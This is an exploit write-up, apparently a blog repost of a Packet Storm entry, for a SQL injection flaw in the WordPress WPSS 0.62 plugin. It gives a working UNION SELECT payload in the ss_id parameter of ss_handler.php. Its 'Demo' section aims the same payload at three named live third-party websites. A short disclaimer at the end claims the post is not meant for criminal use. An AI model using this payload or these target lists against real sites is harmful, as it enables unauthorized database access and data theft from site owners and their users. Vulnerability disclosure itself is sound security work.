http://packetstormsecurity.com/files/127771/WordPress-WPSS-0.62-SQL-Injection.html
#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: Wordpress WPSS V 0.62 Plugin Sql injection
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : Date: 2014-08-05
|
| [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
|
| [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
|
| [*] Version : 0.62
|
| [*] Tested on: Windows , Mozila Firefox
|-------------------------------------------------------------------------|
| [*] PoC :
|
| [*]
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
|-------------------------------------------------------------------------|
| [*] Demo:
|
| [*]
http://www.tahoebusinesses.com//wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
| [*]
http://www.forzabykemp.com/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
| [*]
http://calgarysalesteam.com/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
|-------------------------------------------------------------------------|
| [*]Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
0 komentar:
Post a Comment
I just a newbie and student, don't using this article for criminal